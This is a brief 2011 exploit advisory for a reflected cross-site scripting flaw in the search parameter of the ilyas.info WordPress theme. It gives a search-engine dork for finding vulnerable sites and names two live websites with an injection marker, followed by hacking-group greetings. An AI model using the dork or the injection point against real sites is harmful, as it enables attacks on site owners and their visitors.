# Exploit Title: Ilyas.info Design Cross Site Scripting Vulnerability [WordPress Themes] # Date: 30/10/2011 - 23:00 # Author: 3spi0n # Software Website: http://ilyas.info/ # Tested On: BackTrack 5 - Win7 Ultimate # Platform: Php >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> [$] Vulnerable File: ?s= [$] Dorks: "Theme by Dizayn ilyas.info" [$] Demo Sites: [~] http://www.elektrikdelisi.com/?s="> [XSS] [~] http://www.degirmenmakinalari.com/?s="> [XSS] >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> # We attempted to work, you can not imagine. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> # Contact: Http://3spi0n.Net/ # Greetz: Http://DarkDevilz.in/ >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Mr.PaPaRoSSe Black_Umo ALEXTRAX Brs_BaRoN ZyX x-Leader Legend Coder DARKCOD3R Santiq0 53rh4t PerS ExDeaTH [And DD'z Family] [DarkDevilz - Defence And Destruction Group'z - TURKEY] >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>